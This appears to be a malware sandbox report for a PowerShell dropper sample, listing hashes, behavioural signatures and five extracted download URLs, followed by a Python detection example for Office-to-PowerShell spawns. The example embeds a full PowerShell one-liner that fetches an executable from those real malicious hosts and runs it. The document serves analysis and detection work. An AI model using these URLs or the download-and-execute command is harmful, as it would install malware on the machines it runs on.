General

  • Target

    e62a45cabe2092469274c14bd4f44705_JaffaCakes118

  • Size

    197KB

  • Sample

    240917-gf7lasxerk

  • MD5

    e62a45cabe2092469274c14bd4f44705

  • SHA1

    87801790127af2bc2b871578566786269935f129

  • SHA256

    b47082ac91c297b498c0c6a248704783cbbbccd552058fda6d187952b01bd67b

  • SHA512

    155be9ce9bf0d7aef058f5974ff7324d8c45057ae8a3ce7901a6dbe98da00b5ab1c9ca9ea929374dcf63305cdc124e497318947b5d9bbcecdf6f55c059704169

  • SSDEEP

    3072:bzEWdGujL/xSu90OoiLuDKZXfwKeljR1z:vSUxUOmD+XfwLX

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    Each URL is tagged exe.dropper: a download location the PowerShell stage uses to fetch the next-stage executable. Multiple locations are listed so the dropper can fall back to another host if one download fails.

    http://kantova.com/DWTr10bVVLjs5r

    http://www.hjsanders.nl/889KycAhSPlXPbrS

    http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW

    http://bozziro.ir/YENtfKb77bgd_Gk

    http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ

Targets

    • Target

      e62a45cabe2092469274c14bd4f44705_JaffaCakes118

    • Size

      197KB

    • MD5

      e62a45cabe2092469274c14bd4f44705

    • SHA1

      87801790127af2bc2b871578566786269935f129

    • SHA256

      b47082ac91c297b498c0c6a248704783cbbbccd552058fda6d187952b01bd67b

    • SHA512

      155be9ce9bf0d7aef058f5974ff7324d8c45057ae8a3ce7901a6dbe98da00b5ab1c9ca9ea929374dcf63305cdc124e497318947b5d9bbcecdf6f55c059704169

    • SSDEEP

      3072:bzEWdGujL/xSu90OoiLuDKZXfwKeljR1z:vSUxUOmD+XfwLX

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

      A process on the sandbox's blocklist of commonly abused system binaries made an outbound network request.

    • Command and Scripting Interpreter: PowerShell

      The sample runs powershell.exe to execute its script stage.
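The two signatures above (an Office parent spawning an interpreter, and powershell.exe being used as the script stage) together with the exe.dropper URLs in the extracted config are the pieces a detection engineer would want to reproduce on their own telemetry. The following Python is an added example, not code from the report or the sandbox: it runs the parent/child check over constructed Sysmon-style process-creation events, pulls the download URLs out of the offending command line in the order the script lists them, and defangs them for a ticket. The process paths, the sample command line (which only imitates the common "try each URL until one works" downloader shape, using the five URLs listed in the config), and the helper names are all assumptions made for the illustration.

```python
import re
from dataclasses import dataclass

# Parent/child pairs worth alerting on: an Office application should never need
# to launch a script host or shell. Adjust the sets to your environment.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe", "rundll32.exe"}

# Loose URL matcher: stops at whitespace and at the quoting/separator characters
# PowerShell one-liners put around string literals.
URL_RE = re.compile(r"https?://[^\s'\"`,;)\]]+", re.IGNORECASE)


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 or an EDR equivalent)."""
    pid: int
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_office_spawning_interpreter(ev: ProcEvent) -> bool:
    """The 'Process spawned unexpected child process' condition for Office parents."""
    return (basename(ev.parent_image) in OFFICE_PARENTS
            and basename(ev.image) in SCRIPT_CHILDREN)


def extract_urls(command_line: str) -> list[str]:
    """Every http(s) URL in a command line, in order of appearance, without duplicates."""
    seen: list[str] = []
    for url in URL_RE.findall(command_line):
        if url not in seen:
            seen.append(url)
    return seen


def defang(url: str) -> str:
    """Render a URL safe to paste into a report: hxxp://host[.]tld/path."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}://{host.replace('.', '[.]')}{sep}{path}"


def analyze(events: list[ProcEvent]) -> list[dict]:
    """One finding per suspicious Office -> interpreter spawn, with any download URLs."""
    findings = []
    for ev in events:
        if is_office_spawning_interpreter(ev):
            findings.append({
                "pid": ev.pid,
                "parent": basename(ev.parent_image),
                "child": basename(ev.image),
                "urls": extract_urls(ev.command_line),
            })
    return findings


# Constructed sample telemetry (not from the report). The dropper command line
# imitates the usual "try each URL until one downloads" pattern, using the five
# exe.dropper URLs from the extracted config.
DROPPER_CMDLINE = (
    "powershell.exe -NoP -W Hidden -c \"$u='http://kantova.com/DWTr10bVVLjs5r',"
    "'http://www.hjsanders.nl/889KycAhSPlXPbrS',"
    "'http://altovahealthcare.com/wp-content/uploads/aE06aaGSVoI_HFW',"
    "'http://bozziro.ir/YENtfKb77bgd_Gk',"
    "'http://heizungsnotdienst-sofort.at/JtbiTcyuAGC1ZBQ';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$env:TEMP+'\\d.exe');"
    "Start-Process ($env:TEMP+'\\d.exe');break}catch{}}\""
)

SAMPLE_EVENTS = [
    ProcEvent(1204, r"C:\Windows\explorer.exe", r"C:\Windows\System32\userinit.exe",
              "explorer.exe"),
    ProcEvent(3380, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\explorer.exe", '"WINWORD.EXE" /n invoice.doc'),
    ProcEvent(4412, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", DROPPER_CMDLINE),
    # Benign admin script launched by a service host: same child, different parent.
    ProcEvent(4500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\svchost.exe", "powershell.exe -File C:\\ops\\inventory.ps1"),
]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"pid {finding['pid']}: {finding['parent']} -> {finding['child']}")
        for url in finding["urls"]:
            print("   ", defang(url))
```

Only the WINWORD.EXE -> powershell.exe event is flagged; the svchost.exe -> powershell.exe event is deliberately left alone, because matching on the child alone would page on every scheduled admin script. Keeping the extracted URLs in list order matters when you go to block them: the first host is the one the dropper reaches for first, so it is the one most worth checking in proxy logs.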

MITRE ATT&CK Enterprise v15

Tasks